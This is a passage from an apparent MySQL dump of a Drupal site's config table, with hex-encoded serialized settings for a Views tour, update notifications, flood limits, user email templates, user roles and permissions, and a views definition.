e20796f757220736974652773207573657220696e746572666163652e20496620796f752077616e7420746f20757365207468656d206f6e20616e6f746865722073697465206f72206d6f64696679207468656d206f6e20616e2065787465726e616c207472616e736c6174696f6e20656469746f722c20796f752063616e203c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f6578706f7274223e6578706f7274207468656d3c2f613e20746f2061202e706f2066696c6520616e64203c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f7472616e736c6174652f696d706f7274223e696d706f7274207468656d3c2f613e206c617465722e223b7d7d7d),
('', 'tour.tour.views-ui', 0x613a31303a7b733a343a2275756964223b733a33363a2237393734333964352d306137662d343535392d616532352d366366356136356562646466223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a383a2276696577735f7569223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225849594c314b46374e44325851526135417876456370387667434e326b55476975424e6843677872504d45223b7d733a323a226964223b733a383a2276696577732d7569223b733a353a226c6162656c223b733a31343a225669657720656469742070616765223b733a363a226d6f64756c65223b733a383a2276696577735f7569223b733a363a22726f75746573223b613a323a7b693a303b613a313a7b733a31303a22726f7574655f6e616d65223b733a32313a22656e746974792e766965772e656469745f666f726d223b7d693a313b613a313a7b733a31303a22726f7574655f6e616d65223b733a32393a22656e746974792e766965772e656469745f646973706c61795f666f726d223b7d7d733a343a2274697073223b613a31303a7b733a31303a2276696577732d6d61696e223b613a353a7b733a323a226964223b733a31303a2276696577732d6d61696e223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32303a224d616e61676520766965772073657474696e6773223b733a363a22776569676874223b693a313b733a343a22626f6479223b733a33313a2256696577206f7220656469742074686520636f6e66696775726174696f6e2e223b7d733a31373a2276696577732d75692d646973706c617973223b613a363a7b733a323a226964223b733a31373a2276696577732d75692d646973706c617973223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32313a22446973706c61797320696e20746869732076696577223b733a363a22776569676874223b693a323b733a383a2273656c6563746f72223b733a31383a222376696577732d646973706c61792d746f70223b733a343a22626f6479223b733a3136393a224120646973706c6179206973206120776179206f66206f757470757474696e672074686520726573756c74732c20652e672e2c20617320612070616765206f72206120626c6f636b2e204120766965772063616e20636f6e7461696e206d756c7469706c6520646973706c6179732c20776869636820617265206c697374656420686572652e205468652061637469766520646973706c617920697320686967686c6967687465642e223b7d733a31393a2276696577732d75692d766965772d61646d696e223b613a373a7b733a323a226964223b733a31393a2276696577732d75692d766965772d61646d696e223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31393a22566965772061646d696e697374726174696f6e223b733a363a22776569676874223b693a333b733a383a22706f736974696f6e223b733a353a227269676874223b733a383a2273656c6563746f72223b733a32383a222376696577732d646973706c61792d65787472612d616374696f6e73223b733a343a22626f6479223b733a3134303a22506572666f726d2061646d696e697374726174697665207461736b732c20696e636c7564696e6720616464696e672061206465736372697074696f6e20616e64206372656174696e67206120636c6f6e652e20436c69636b207468652064726f702d646f776e20627574746f6e20746f20766965772074686520617661696c61626c65206f7074696f6e732e223b7d733a31353a2276696577732d75692d666f726d6174223b613a363a7b733a323a226964223b733a31353a2276696577732d75692d666f726d6174223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31333a224f757470757420666f726d6174223b733a363a22776569676874223b693a343b733a383a2273656c6563746f72223b733a33353a222e76696577732d75692d646973706c61792d7461622d6275636b65742e666f726d6174223b733a343a22626f6479223b733a3332353a2243686f6f736520686f7720746f206f757470757420726573756c74732e20452e672e2c2063686f6f7365203c656d3e436f6e74656e743c2f656d3e20746f206f75747075742065616368206974656d20636f6d706c6574656c792c207573696e6720796f757220636f6e6669677572656420646973706c61792073657474696e67732e204f722063686f6f7365203c656d3e4669656c64733c2f656d3e2c20776869636820616c6c6f777320796f7520746f206f7574707574206f6e6c79207370656369666963206669656c647320666f72206561636820726573756c742e204164646974696f6e616c20666f726d6174732063616e20626520616464656420627920696e7374616c6c696e67206d6f64756c657320746f203c656d3e657874656e643c2f656d3e2044727570616c277320626173652066756e6374696f6e616c6974792e223b7d733a31353a2276696577732d75692d6669656c6473223b613a363a7b733a323a226964223b733a31353a2276696577732d75692d6669656c6473223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31353a22e38395e382a3e383bce383abe38389223b733a363a22776569676874223b693a353b733a383a2273656c6563746f72223b733a33343a222e76696577732d75692d646973706c61792d7461622d6275636b65742e6669656c64223b733a343a22626f6479223b733a38393a224966207468697320766965772075736573206669656c64732c207468657920617265206c697374656420686572652e20596f752063616e20636c69636b206f6e2061206669656c6420746f20636f6e6669677572652069742e223b7d733a31353a2276696577732d75692d66696c746572223b613a363a7b733a323a226964223b733a31353a2276696577732d75692d66696c746572223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31363a2246696c74657220796f75722076696577223b733a363a22776569676874223b693a363b733a383a2273656c6563746f72223b733a33353a222e76696577732d75692d646973706c61792d7461622d6275636b65742e66696c746572223b733a343a22626f6479223b733a3137333a224164642066696c7465727320746f206c696d69742074686520726573756c747320696e20746865206f75747075742e20452e672e2c20746f206f6e6c792073686f7720636f6e74656e742074686174206973203c656d3e7075626c69736865643c2f656d3e2c20796f7520776f756c642061646420612066696c74657220666f72203c656d3e5075626c69736865643c2f656d3e20616e642073656c656374203c656d3e5965733c2f656d3e2e223b7d733a32363a2276696577732d75692d66696c7465722d6f7065726174696f6e73223b613a363a7b733a323a226964223b733a32363a2276696577732d75692d66696c7465722d6f7065726174696f6e73223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31343a2246696c74657220616374696f6e73223b733a363a22776569676874223b693a373b733a383a2273656c6563746f72223b733a35343a222e76696577732d75692d646973706c61792d7461622d6275636b65742e66696c746572202e64726f70627574746f6e2d776964676574223b733a343a22626f6479223b733a33333a224164642c207265617272616e6765206f722072656d6f76652066696c746572732e223b7d733a31343a2276696577732d75692d736f727473223b613a363a7b733a323a226964223b733a31343a2276696577732d75692d736f727473223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31333a22536f7274204372697465726961223b733a363a22776569676874223b693a383b733a383a2273656c6563746f72223b733a33333a222e76696577732d75692d646973706c61792d7461622d6275636b65742e736f7274223b733a343a22626f6479223b733a39363a22436f6e74726f6c20746865206f7264657220696e2077686963682074686520726573756c747320617265206f75747075742e20436c69636b206f6e20616e2061637469766520736f72742072756c6520746f20636f6e6669677572652069742e223b7d733a32353a2276696577732d75692d736f7274732d6f7065726174696f6e73223b613a363a7b733a323a226964223b733a32353a2276696577732d75692d736f7274732d6f7065726174696f6e73223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31323a22536f727420616374696f6e73223b733a363a22776569676874223b693a393b733a383a2273656c6563746f72223b733a35323a222e76696577732d75692d646973706c61792d7461622d6275636b65742e736f7274202e64726f70627574746f6e2d776964676574223b733a343a22626f6479223b733a33393a224164642c207265617272616e6765206f722072656d6f766520736f7274696e672072756c65732e223b7d733a31363a2276696577732d75692d70726576696577223b613a373a7b733a323a226964223b733a31363a2276696577732d75692d70726576696577223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a373a2250726576696577223b733a363a22776569676874223b693a31303b733a383a22706f736974696f6e223b733a353a227269676874223b733a383a2273656c6563746f72223b733a31353a2223707265766965772d7375626d6974223b733a343a22626f6479223b733a33343a2253686f7720612070726576696577206f66207468652076696577206f75747075742e223b7d7d7d),
('', 'update.settings', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2232517a554c66307a6f764a5178334a303659397275667a7a66692d4359324354546c45664a4a6832517977223b7d733a353a22636865636b223b613a323a7b733a31393a2264697361626c65645f657874656e73696f6e73223b623a303b733a31333a22696e74657276616c5f64617973223b693a313b7d733a353a226665746368223b613a333a7b733a333a2275726c223b4e3b733a31323a226d61785f617474656d707473223b693a323b733a373a2274696d656f7574223b693a33303b7d733a31323a226e6f74696669636174696f6e223b613a323a7b733a363a22656d61696c73223b613a313a7b693a303b733a32323a2263686177636861772e6b637440676d61696c2e636f6d223b7d733a393a227468726573686f6c64223b733a333a22616c6c223b7d7d),
('', 'user.flood', 0x613a363a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225559664d7a65503153386a4b6d395053767866376e514e653844734e532d3362633257534e4e5842515773223b7d733a383a227569645f6f6e6c79223b623a303b733a383a2269705f6c696d6974223b693a35303b733a393a2269705f77696e646f77223b693a333630303b733a31303a22757365725f6c696d6974223b693a353b733a31313a22757365725f77696e646f77223b693a32313630303b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'user.mail', 0x613a31313a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2236435a497a46696652713371626471336e336e4470454f4f3468574951744b4f41514e5076474e474b654d223b7d733a383a226c616e67636f6465223b733a323a226a61223b733a31343a2263616e63656c5f636f6e6669726d223b613a323a7b733a373a227375626a656374223b733a36373a224163636f756e742063616e63656c6c6174696f6e207265717565737420666f72205b757365723a646973706c61792d6e616d655d206174205b736974653a6e616d655d223b733a343a22626f6479223b733a3338383a225b757365723a646973706c61792d6e616d655d0d0a0d0a41207265717565737420746f2063616e63656c20796f7572206163636f756e7420686173206265656e206d616465206174205b736974653a6e616d655d2e0d0a0d0a596f75206d6179206e6f772063616e63656c20796f7572206163636f756e74206f6e205b736974653a75726c2d62726965665d20627920636c69636b696e672074686973206c696e6b206f7220636f7079696e6720616e642070617374696e6720697420696e746f20796f75722062726f777365723a0d0a0d0a5b757365723a63616e63656c2d75726c5d0d0a0d0a4e4f54453a205468652063616e63656c6c6174696f6e206f6620796f7572206163636f756e74206973206e6f742072657665727369626c652e0d0a0d0a54686973206c696e6b206578706972657320696e206f6e652064617920616e64206e6f7468696e672077696c6c2068617070656e206966206974206973206e6f7420757365642e0d0a0d0a2d2d20205b736974653a6e616d655d207465616d223b7d733a31343a2270617373776f72645f7265736574223b613a323a7b733a373a227375626a656374223b733a36383a225265706c6163656d656e74206c6f67696e20696e666f726d6174696f6e20666f72205b757365723a646973706c61792d6e616d655d206174205b736974653a6e616d655d223b733a343a22626f6479223b733a3431373a225b757365723a646973706c61792d6e616d655d2c0d0a0d0a41207265717565737420746f207265736574207468652070617373776f726420666f7220796f7572206163636f756e7420686173206265656e206d616465206174205b736974653a6e616d655d2e0d0a0d0a596f75206d6179206e6f77206c6f6720696e20627920636c69636b696e672074686973206c696e6b206f7220636f7079696e6720616e642070617374696e6720697420696e746f20796f75722062726f777365723a0d0a0d0a5b757365723a6f6e652d74696d652d6c6f67696e2d75726c5d0d0a0d0a54686973206c696e6b2063616e206f6e6c792062652075736564206f6e636520746f206c6f6720696e20616e642077696c6c206c65616420796f7520746f2061207061676520776865726520796f752063616e2073657420796f75722070617373776f72642e2049742065787069726573206166746572206f6e652064617920616e64206e6f7468696e672077696c6c2068617070656e2069662069742773206e6f7420757365642e0d0a0d0a2d2d20205b736974653a6e616d655d207465616d223b7d733a32323a2272656769737465725f61646d696e5f63726561746564223b613a323a7b733a373a227375626a656374223b733a35383a22416e2061646d696e6973747261746f72206372656174656420616e206163636f756e7420666f7220796f75206174205b736974653a6e616d655d223b733a343a22626f6479223b733a3438363a225b757365723a646973706c61792d6e616d655d2c0d0a0d0a4120736974652061646d696e6973747261746f72206174205b736974653a6e616d655d20686173206372656174656420616e206163636f756e7420666f7220796f752e20596f75206d6179206e6f77206c6f6720696e20627920636c69636b696e672074686973206c696e6b206f7220636f7079696e6720616e642070617374696e6720697420696e746f20796f75722062726f777365723a0d0a0d0a5b757365723a6f6e652d74696d652d6c6f67696e2d75726c5d0d0a0d0a54686973206c696e6b2063616e206f6e6c792062652075736564206f6e636520746f206c6f6720696e20616e642077696c6c206c65616420796f7520746f2061207061676520776865726520796f752063616e2073657420796f75722070617373776f72642e0d0a0d0a41667465722073657474696e6720796f75722070617373776f72642c20796f752077696c6c2062652061626c6520746f206c6f6720696e206174205b736974653a6c6f67696e2d75726c5d20696e2074686520667574757265207573696e673a0d0a0d0a757365726e616d653a205b757365723a6e616d655d0d0a70617373776f72643a20596f75722070617373776f72640d0a0d0a2d2d20205b736974653a6e616d655d207465616d223b7d733a32393a2272656769737465725f6e6f5f617070726f76616c5f7265717569726564223b613a323a7b733a373a227375626a656374223b733a35343a224163636f756e742064657461696c7320666f72205b757365723a646973706c61792d6e616d655d206174205b736974653a6e616d655d223b733a343a22626f6479223b733a3436303a225b757365723a646973706c61792d6e616d655d2c0d0a0d0a5468616e6b20796f7520666f72207265676973746572696e67206174205b736974653a6e616d655d2e20596f75206d6179206e6f77206c6f6720696e20627920636c69636b696e672074686973206c696e6b206f7220636f7079696e6720616e642070617374696e6720697420696e746f20796f75722062726f777365723a0d0a0d0a5b757365723a6f6e652d74696d652d6c6f67696e2d75726c5d0d0a0d0a54686973206c696e6b2063616e206f6e6c792062652075736564206f6e636520746f206c6f6720696e20616e642077696c6c206c65616420796f7520746f2061207061676520776865726520796f752063616e2073657420796f75722070617373776f72642e0d0a0d0a41667465722073657474696e6720796f75722070617373776f72642c20796f752077696c6c2062652061626c6520746f206c6f6720696e206174205b736974653a6c6f67696e2d75726c5d20696e2074686520667574757265207573696e673a0d0a0d0a757365726e616d653a205b757365723a6e616d655d0d0a70617373776f72643a20596f75722070617373776f72640d0a0d0a2d2d20205b736974653a6e616d655d207465616d223b7d733a32353a2272656769737465725f70656e64696e675f617070726f76616c223b613a323a7b733a373a227375626a656374223b733a37393a224163636f756e742064657461696c7320666f72205b757365723a646973706c61792d6e616d655d206174205b736974653a6e616d655d202870656e64696e672061646d696e20617070726f76616c29223b733a343a22626f6479223b733a3239323a225b757365723a646973706c61792d6e616d655d2c0d0a0d0a5468616e6b20796f7520666f72207265676973746572696e67206174205b736974653a6e616d655d2e20596f7572206170706c69636174696f6e20666f7220616e206163636f756e742069732063757272656e746c792070656e64696e6720617070726f76616c2e204f6e636520697420686173206265656e20617070726f7665642c20796f752077696c6c207265636569766520616e6f7468657220656d61696c20636f6e7461696e696e6720696e666f726d6174696f6e2061626f757420686f7720746f206c6f6720696e2c2073657420796f75722070617373776f72642c20616e64206f746865722064657461696c732e0d0a0d0a2d2d20205b736974653a6e616d655d207465616d223b7d733a33313a2272656769737465725f70656e64696e675f617070726f76616c5f61646d696e223b613a323a7b733a373a227375626a656374223b733a37393a224163636f756e742064657461696c7320666f72205b757365723a646973706c61792d6e616d655d206174205b736974653a6e616d655d202870656e64696e672061646d696e20617070726f76616c29223b733a343a22626f6479223b733a36363a225b757365723a646973706c61792d6e616d655d20686173206170706c69656420666f7220616e206163636f756e742e0d0a0d0a5b757365723a656469742d75726c5d223b7d733a31363a227374617475735f616374697661746564223b613a323a7b733a373a227375626a656374223b733a36353a224163636f756e742064657461696c7320666f72205b757365723a646973706c61792d6e616d655d206174205b736974653a6e616d655d2028617070726f76656429223b733a343a22626f6479223b733a3437373a225b757365723a646973706c61792d6e616d655d2c0d0a0d0a596f7572206163636f756e74206174205b736974653a6e616d655d20686173206265656e206163746976617465642e0d0a0d0a596f75206d6179206e6f77206c6f6720696e20627920636c69636b696e672074686973206c696e6b206f7220636f7079696e6720616e642070617374696e6720697420696e746f20796f75722062726f777365723a0d0a0d0a5b757365723a6f6e652d74696d652d6c6f67696e2d75726c5d0d0a0d0a54686973206c696e6b2063616e206f6e6c792062652075736564206f6e636520746f206c6f6720696e20616e642077696c6c206c65616420796f7520746f2061207061676520776865726520796f752063616e2073657420796f75722070617373776f72642e0d0a0d0a41667465722073657474696e6720796f75722070617373776f72642c20796f752077696c6c2062652061626c6520746f206c6f6720696e206174205b736974653a6c6f67696e2d75726c5d20696e2074686520667574757265207573696e673a0d0a0d0a757365726e616d653a205b757365723a6163636f756e742d6e616d655d0d0a70617373776f72643a20596f75722070617373776f72640d0a0d0a2d2d20205b736974653a6e616d655d207465616d223b7d733a31343a227374617475735f626c6f636b6564223b613a323a7b733a373a227375626a656374223b733a36343a224163636f756e742064657461696c7320666f72205b757365723a646973706c61792d6e616d655d206174205b736974653a6e616d655d2028626c6f636b656429223b733a343a22626f6479223b733a39333a225b757365723a646973706c61792d6e616d655d2c0d0a0d0a596f7572206163636f756e74206f6e205b736974653a6e616d655d20686173206265656e20626c6f636b65642e0d0a0d0a2d2d20205b736974653a6e616d655d207465616d223b7d733a31353a227374617475735f63616e63656c6564223b613a323a7b733a373a227375626a656374223b733a36353a224163636f756e742064657461696c7320666f72205b757365723a646973706c61792d6e616d655d206174205b736974653a6e616d655d202863616e63656c656429223b733a343a22626f6479223b733a39343a225b757365723a646973706c61792d6e616d655d2c0d0a0d0a596f7572206163636f756e74206f6e205b736974653a6e616d655d20686173206265656e2063616e63656c65642e0d0a0d0a2d2d20205b736974653a6e616d655d207465616d223b7d7d),
('', 'user.role.administrator', 0x613a31303a7b733a343a2275756964223b733a33363a2266616461643631312d356331662d343161352d626635302d353831323536323735663064223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224f654b47496b6d5a415f632d7436514c483831574e51783867444363314d526d7861547551677842427955223b7d733a323a226964223b733a31333a2261646d696e6973747261746f72223b733a353a226c6162656c223b733a31333a2241646d696e6973747261746f72223b733a363a22776569676874223b693a333b733a383a2269735f61646d696e223b623a313b733a31313a227065726d697373696f6e73223b613a303a7b7d7d),
('', 'user.role.anonymous', 0x613a31303a7b733a343a2275756964223b733a33363a2234623265323764312d306430622d343863622d616538382d613832363561663463336439223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32393a2266696c7465722e666f726d61742e726573747269637465645f68746d6c223b7d733a363a226d6f64756c65223b613a363a7b693a303b733a373a22636f6d6d656e74223b693a313b733a373a22636f6e74616374223b693a323b733a363a2266696c746572223b693a333b733a353a226d65646961223b693a343b733a363a22736561726368223b693a353b733a363a2273797374656d223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22365761766a5559584965675039414167327a58477835344d5749566f6f6d4333535a684e6971652d44796b223b7d733a323a226964223b733a393a22616e6f6e796d6f7573223b733a353a226c6162656c223b733a31343a22416e6f6e796d6f75732075736572223b733a363a22776569676874223b693a303b733a383a2269735f61646d696e223b623a303b733a31313a227065726d697373696f6e73223b613a363a7b693a303b733a31353a2261636365737320636f6d6d656e7473223b693a313b733a31343a2261636365737320636f6e74656e74223b693a323b733a32393a2261636365737320736974652d7769646520636f6e7461637420666f726d223b693a333b733a31343a2273656172636820636f6e74656e74223b693a343b733a33313a22757365207465787420666f726d617420726573747269637465645f68746d6c223b693a353b733a31303a2276696577206d65646961223b7d7d),
('', 'user.role.authenticated', 0x613a31303a7b733a343a2275756964223b733a33363a2263393331643761372d366664382d343132622d613533332d646665386436396438366634223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a2266696c7465722e666f726d61742e62617369635f68746d6c223b7d733a363a226d6f64756c65223b613a383a7b693a303b733a373a22636f6d6d656e74223b693a313b733a373a22636f6e74616374223b693a323b733a343a2266696c65223b693a333b733a363a2266696c746572223b693a343b733a353a226d65646961223b693a353b733a363a22736561726368223b693a363b733a383a2273686f7274637574223b693a373b733a363a2273797374656d223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2249343451414234657333396c4e7a4d5157694a4c713264666a58375652534f7a545f354b7a416355715f4d223b7d733a323a226964223b733a31333a2261757468656e74696361746564223b733a353a226c6162656c223b733a31383a2241757468656e746963617465642075736572223b733a363a22776569676874223b693a313b733a383a2269735f61646d696e223b623a303b733a31313a227065726d697373696f6e73223b613a31303a7b693a303b733a31353a2261636365737320636f6d6d656e7473223b693a313b733a31343a2261636365737320636f6e74656e74223b693a323b733a31363a226163636573732073686f727463757473223b693a333b733a32393a2261636365737320736974652d7769646520636f6e7461637420666f726d223b693a343b733a31363a2264656c657465206f776e2066696c6573223b693a353b733a31333a22706f737420636f6d6d656e7473223b693a363b733a31343a2273656172636820636f6e74656e74223b693a373b733a32313a22736b697020636f6d6d656e7420617070726f76616c223b693a383b733a32363a22757365207465787420666f726d61742062617369635f68746d6c223b693a393b733a31303a2276696577206d65646961223b7d7d),
('', 'user.role.content_editor', 0x613a31303a7b733a343a2275756964223b733a33363a2233373937623733322d343833652d346133642d383964642d666661323862383037303463223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a333a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b693a313b733a31343a226e6f64652e747970652e70616765223b693a323b733a32343a227461786f6e6f6d792e766f636162756c6172792e74616773223b7d733a363a226d6f64756c65223b613a31303a7b693a303b733a373a22636f6d6d656e74223b693a313b733a31303a22636f6e7465787475616c223b693a323b733a343a2266696c65223b693a333b733a343a2268656c70223b693a343b733a343a226e6f6465223b693a353b733a343a2270617468223b693a363b733a363a2273797374656d223b693a373b733a383a227461786f6e6f6d79223b693a383b733a373a22746f6f6c626172223b693a393b733a343a22746f7572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22577572396b63454f7759314a616c38314e73734b6e7a335268564a7841764277795751424763415f31476f223b7d733a323a226964223b733a31343a22636f6e74656e745f656469746f72223b733a353a226c6162656c223b733a31343a22436f6e74656e7420656469746f72223b733a363a22776569676874223b693a323b733a383a2269735f61646d696e223b623a303b733a31313a227065726d697373696f6e73223b613a32353a7b693a303b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b693a313b733a32333a2261636365737320636f6e74656e74206f76657276696577223b693a323b733a32333a2261636365737320636f6e7465787475616c206c696e6b73223b693a333b733a32313a226163636573732066696c6573206f76657276696577223b693a343b733a31373a226163636573732068656c70207061676573223b693a353b733a31343a2261636365737320746f6f6c626172223b693a363b733a31313a2261636365737320746f7572223b693a373b733a32323a2261646d696e69737465722075726c20616c6961736573223b693a383b733a32323a226372656174652061727469636c6520636f6e74656e74223b693a393b733a31393a22637265617465207061676520636f6e74656e74223b693a31303b733a32303a22637265617465207465726d7320696e2074616773223b693a31313b733a31383a226372656174652075726c20616c6961736573223b693a31323b733a32343a2264656c6574652061727469636c65207265766973696f6e73223b693a31333b733a32363a2264656c657465206f776e2061727469636c6520636f6e74656e74223b693a31343b733a31363a2264656c657465206f776e2066696c6573223b693a31353b733a32333a2264656c657465206f776e207061676520636f6e74656e74223b693a31363b733a32313a2264656c6574652070616765207265766973696f6e73223b693a31373b733a32343a2265646974206f776e2061727469636c6520636f6e74656e74223b693a31383b733a31373a2265646974206f776e20636f6d6d656e7473223b693a31393b733a32313a2265646974206f776e207061676520636f6e74656e74223b693a32303b733a31383a2265646974207465726d7320696e2074616773223b693a32313b733a32303a2272657665727420616c6c207265766973696f6e73223b693a32323b733a31383a227669657720616c6c207265766973696f6e73223b693a32333b733a32383a2276696577206f776e20756e7075626c697368656420636f6e74656e74223b693a32343b733a32393a2276696577207468652061646d696e697374726174696f6e207468656d65223b7d7d),
('', 'user.settings', 0x613a393a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a222d687444465755763153344f6c4a4d7a7461326e68466c345162684a767530443978734a2d636c786f2d4d223b7d733a383a226c616e67636f6465223b733a323a226a61223b733a393a22616e6f6e796d6f7573223b733a393a22416e6f6e796d6f7573223b733a31313a227665726966795f6d61696c223b623a313b733a363a226e6f74696679223b613a383a7b733a31343a2263616e63656c5f636f6e6669726d223b623a313b733a31343a2270617373776f72645f7265736574223b623a313b733a31363a227374617475735f616374697661746564223b623a313b733a31343a227374617475735f626c6f636b6564223b623a303b733a31353a227374617475735f63616e63656c6564223b623a303b733a32323a2272656769737465725f61646d696e5f63726561746564223b623a313b733a32393a2272656769737465725f6e6f5f617070726f76616c5f7265717569726564223b623a313b733a32353a2272656769737465725f70656e64696e675f617070726f76616c223b623a313b7d733a383a227265676973746572223b733a31303a2261646d696e5f6f6e6c79223b733a31333a2263616e63656c5f6d6574686f64223b733a31373a22757365725f63616e63656c5f626c6f636b223b733a32323a2270617373776f72645f72657365745f74696d656f7574223b693a38363430303b733a31373a2270617373776f72645f737472656e677468223b623a313b7d),
('', 'views.settings', 0x613a353a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22755a48734c7244703154684f3052767570484b63507a4c4f7956765765786d35384a5454484e446f377963223b7d733a31373a22646973706c61795f657874656e64657273223b613a303a7b7d733a31333a2273716c5f7369676e6174757265223b623a303b733a323a227569223b613a333a7b733a343a2273686f77223b613a373a7b733a31383a226164646974696f6e616c5f71756572696573223b623a303b733a31353a22616476616e6365645f636f6c756d6e223b623a303b733a31353a2264656661756c745f646973706c6179223b623a303b733a32323a22706572666f726d616e63655f73746174697374696373223b623a303b733a31393a22707265766965775f696e666f726d6174696f6e223b623a313b733a393a2273716c5f7175657279223b613a323a7b733a373a22656e61626c6564223b623a303b733a353a227768657265223b733a353a2261626f7665223b7d733a31333a22646973706c61795f656d626564223b623a303b7d733a31393a22616c776179735f6c6976655f70726576696577223b623a313b733a32343a226578706f7365645f66696c7465725f616e795f6c6162656c223b733a373a226f6c645f616e79223b7d733a32323a226669656c645f726577726974655f656c656d656e7473223b613a32393a7b733a333a22646976223b733a333a22444956223b733a343a227370616e223b733a343a225350414e223b733a323a226831223b733a323a224831223b733a323a226832223b733a323a224832223b733a323a226833223b733a323a224833223b733a323a226834223b733a323a224834223b733a323a226835223b733a323a224835223b733a323a226836223b733a323a224836223b733a313a2270223b733a313a2250223b733a363a22686561646572223b733a363a22484541444552223b733a363a22666f6f746572223b733a363a22464f4f544552223b733a373a2261727469636c65223b733a373a2241525449434c45223b733a373a2273656374696f6e223b733a373a2253454354494f4e223b733a353a226173696465223b733a353a224153494445223b733a373a2264657461696c73223b733a373a2244455441494c53223b733a31303a22626c6f636b71756f7465223b733a31303a22424c4f434b51554f5445223b733a363a22666967757265223b733a363a22464947555245223b733a373a2261646472657373223b733a373a2241444452455353223b733a343a22636f6465223b733a343a22434f4445223b733a333a22707265223b733a333a22505245223b733a333a22766172223b733a333a22564152223b733a343a2273616d70223b733a343a2253414d50223b733a333a226b6264223b733a333a224b4244223b733a363a227374726f6e67223b733a363a225354524f4e47223b733a323a22656d223b733a323a22454d223b733a333a2264656c223b733a333a2244454c223b733a333a22696e73223b733a333a22494e53223b733a313a2271223b733a313a2251223b733a313a2273223b733a313a2253223b7d7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'views.view.activity', 0x613a31323a7b733a343a2275756964223b733a33363a2262633138373363332d396465322d343536632d386239352d643137393965363331343831223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a353a7b693a303b733a34373a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f6465736372697074696f6e223b693a313b733a33393a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f696d67223b693a323b733a34353a226669656c642e73746f726167652e6e6f64652e6669656c645f616374697669746965735f706f73745f64617465223b693a333b733a32343a22696d6167652e7374796c652e616e6e6f756e63655f696d67223b693a343b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a353a7b693a303b733a383a226461746574696d65223b693a313b733a353a22696d616765223b693a323b733a343a226e6f6465223b693a333b733a343a2274657874223b693a343b733a343a2275736572223b7d7d733a323a226964223b733a383a226163746976697479223b733a353a226c6162656c223b733a383a226163746976697479223b733a363a226d6f64756c65223b733a353a227669657773223b733a31313a226465736372697074696f6e223b733a303a22223b733a333a22746167223b733a303a22223b733a31303a22626173655f7461626c65223b733a31353a226e6f64655f6669656c645f64617461223b733a31303a22626173655f6669656c64223b733a333a226e6964223b733a373a22646973706c6179223b613a333a7b733a373a2264656661756c74223b613a363a7b733a323a226964223b733a373a2264656661756c74223b733a31333a22646973706c61795f7469746c65223b733a373a2244656661756c74223b733a31343a22646973706c61795f706c7567696e223b733a373a2264656661756c74223b733a383a22706f736974696f6e223b693a303b733a31353a22646973706c61795f6f7074696f6e73223b613a31373a7b733a353a227469746c65223b733a31303a2241637469766974696573223b733a363a226669656c6473223b613a353a7b733a32303a226669656c645f616374697669746965735f696d67223b613a33353a7b733a323a226964223b733a32303a226669656c645f616374697669746965735f696d67223b733a353a227461626c65223b733a32363a226e6f64655f5f6669656c645f616374697669746965735f696d67223b733a353a226669656c64223b733a32303a226669656c645f616374697669746965735f696d67223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a393a22706c7567696e5f6964223b733a353a226669656c64223b733a353a226c6162656c223b733a303a22223b733a373a226578636c756465223b623a303b733a353a22616c746572223b613a32363a7b733a31303a22616c7465725f74657874223b623a303b733a343a2274657874223b733a303a22223b733a393a226d616b655f6c696e6